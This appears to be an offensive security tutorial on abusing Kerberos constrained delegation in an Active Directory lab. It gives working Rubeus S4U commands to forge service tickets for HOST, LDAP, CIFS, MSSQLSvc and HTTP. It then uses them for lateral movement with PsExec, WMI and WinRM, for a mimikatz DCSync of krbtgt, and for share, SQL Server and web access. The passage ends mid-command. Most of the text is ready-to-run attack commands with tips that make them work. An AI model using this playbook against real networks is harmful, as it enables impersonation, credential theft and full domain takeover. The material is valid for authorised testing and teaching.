Service Tickets and Abuses

1. Service Ticket for HOST (Lateral Movement with PsExec, wmi, winrm)

The HOST service class covers the Service Control Manager and the other RPC-based services on the target, but it is rarely enough on its own: Windows looks up the ticket cache by the exact SPN a client asks for, so you need a ticket for every service class the tool will request. PsExec copies its service binary to ADMIN$ and drives the SCM over the svcctl named pipe, both over SMB (CIFS); WMI uses DCOM/RPC (HOST and RPCSS); WinRM requests HTTP. Rubeus accepts a comma-separated /altservice list and builds one ticket per class from a single S4U2proxy exchange.

Steps:

  • Obtain the service tickets (all classes in one run):

    C:\Users\Alex> .\Rubeus.exe s4u /impersonateuser:alex /msdsspn:cifs/dc.dev.dhitalcorp.local /altservice:cifs,host,rpcss,http /user:sql-1$ /ticket:<base64TGT> /nowrap
  • Inject each ticket. Rubeus takes the base64 blob directly; saving it with echo writes base64 text, not a DER .kirbi, and ptt cannot load that file. Adding /ptt to the s4u command injects every ticket in one step:

    C:\Users\Alex> .\Rubeus.exe ptt /ticket:<base64ServiceTicket>
  • Confirm the tickets are in the current logon session before using them:

    C:\Users\Alex> klist
  • Use PsExec to run commands on the target system (uses the cifs and host tickets):

    C:\Users\Alex> psexec.exe \\dc.dev.dhitalcorp.local cmd
  • Access WinRM (uses the http ticket). Do not pass -Credential: a password starts a fresh logon and bypasses the injected tickets:

    PS C:\Users\Alex> Enter-PSSession -ComputerName dc.dev.dhitalcorp.local
  • Access WMI (uses the host and rpcss tickets), again without -Credential:

    PS C:\Users\Alex> Get-WmiObject -Class Win32_OperatingSystem -ComputerName dc.dev.dhitalcorp.local

2. Service Ticket for LDAP (DC Sync Attack)

The LDAP service ticket is what mimikatz uses to bind to the Directory Replication Service (DRSUAPI) RPC interface on the Domain Controller and replicate account secrets (DC Sync). The ticket only authenticates alex; the replication is authorized by alex's rights on the domain object, so this works only if the impersonated user holds DS-Replication-Get-Changes and DS-Replication-Get-Changes-All (Domain Admins and Domain Controllers have them by default).

Steps:

  • Obtain the LDAP service ticket:

    C:\Users\Alex> .\Rubeus.exe s4u /impersonateuser:alex /msdsspn:cifs/dc.dev.dhitalcorp.local /altservice:ldap /user:sql-1$ /ticket:<base64TGT> /nowrap
  • Inject the ticket (Rubeus takes the base64 blob directly; adding /ptt to the s4u command injects it in one step):

    C:\Users\Alex> .\Rubeus.exe ptt /ticket:<base64ServiceTicket>
  • Perform the DC Sync attack using mimikatz. Any account can be named: krbtgt is the usual target because its key forges golden tickets, /user:dc$ pulls the DC machine account instead:

    C:\Users\Alex> mimikatz.exe
    mimikatz # lsadump::dcsync /domain:dev.dhitalcorp.local /user:krbtgt

3. Service Ticket for CIFS (File Share Access)

The CIFS service ticket authenticates SMB sessions to the target, so with it you can list, read, write or modify files on any share alex is allowed to reach (C$ and ADMIN$ only if alex is a local administrator there).

Steps:

  • Obtain the CIFS service ticket (no /altservice is needed because the delegated SPN is already cifs):

    C:\Users\Alex> .\Rubeus.exe s4u /impersonateuser:alex /msdsspn:cifs/dc.dev.dhitalcorp.local /user:sql-1$ /ticket:<base64TGT> /nowrap
  • Inject the ticket (Rubeus takes the base64 blob directly; saving it with echo writes base64 text, not a DER .kirbi, and ptt cannot load that file):

    C:\Users\Alex> .\Rubeus.exe ptt /ticket:<base64ServiceTicket>
  • Access the file share. Give net use no username or password, otherwise it opens a new session instead of using the ticket:

    C:\Users\Alex> net use \\dc.dev.dhitalcorp.local\c$
    C:\Users\Alex> dir \\dc.dev.dhitalcorp.local\c$

4. Service Ticket for MSSQLSvc (SQL Server Access)

The MSSQLSvc service ticket authenticates a Windows-integrated login to a SQL Server instance as alex, allowing you to run queries and potentially extract data. SQL Server registers its SPN with the instance port, normally MSSQLSvc/dc.dev.dhitalcorp.local:1433, and the client looks up the ticket cache by that exact name, so the substituted service name must include the port; Rubeus accepts a full class/host form in /altservice.

Steps:

  • Check which SPN the instance actually registered:

    C:\Users\Alex> setspn -Q MSSQLSvc/*
  • Obtain the MSSQLSvc service ticket with the matching SPN:

    C:\Users\Alex> .\Rubeus.exe s4u /impersonateuser:alex /msdsspn:cifs/dc.dev.dhitalcorp.local /altservice:MSSQLSvc/dc.dev.dhitalcorp.local:1433 /user:sql-1$ /ticket:<base64TGT> /nowrap
  • Inject the ticket (Rubeus takes the base64 blob directly; saving it with echo writes base64 text, not a DER .kirbi, and ptt cannot load that file):

    C:\Users\Alex> .\Rubeus.exe ptt /ticket:<base64ServiceTicket>
  • Access the SQL Server with integrated authentication (-E). A -U/-P pair is a SQL login, which never touches Kerberos and ignores the injected ticket:

    C:\Users\Alex> sqlcmd -S dc.dev.dhitalcorp.local -d master -E
    1> SELECT SYSTEM_USER;
    2> GO

5. Service Ticket for HTTP (Web Service Access)

The HTTP service ticket authenticates to web applications behind Windows authentication on the target (IIS sites and anything else that accepts Negotiate), so you interact with them as the impersonated user.

Steps:

  • Obtain the HTTP service ticket:

    C:\Users\Alex> .\Rubeus.exe s4u /impersonateuser:alex /msdsspn:cifs/dc.dev.dhitalcorp.local /altservice:http /user:sql-1$ /ticket:<base64TGT> /nowrap
  • Inject the ticket (Rubeus takes the base64 blob directly; saving it with echo writes base64 text, not a DER .kirbi, and ptt cannot load that file):

    C:\Users\Alex> .\Rubeus.exe ptt /ticket:<base64ServiceTicket>
  • Access the web application:

    The Authorization: Negotiate header carries an SPNEGO token (a Kerberos AP-REQ built from the cached ticket), not the base64 .kirbi, so let the client build it from the current logon session. The Windows build of curl does this through SSPI with --negotiate and an empty user; in PowerShell, Invoke-WebRequest -UseDefaultCredentials does the same:

    C:\Users\Alex> curl --negotiate -u : http://dc.dev.dhi
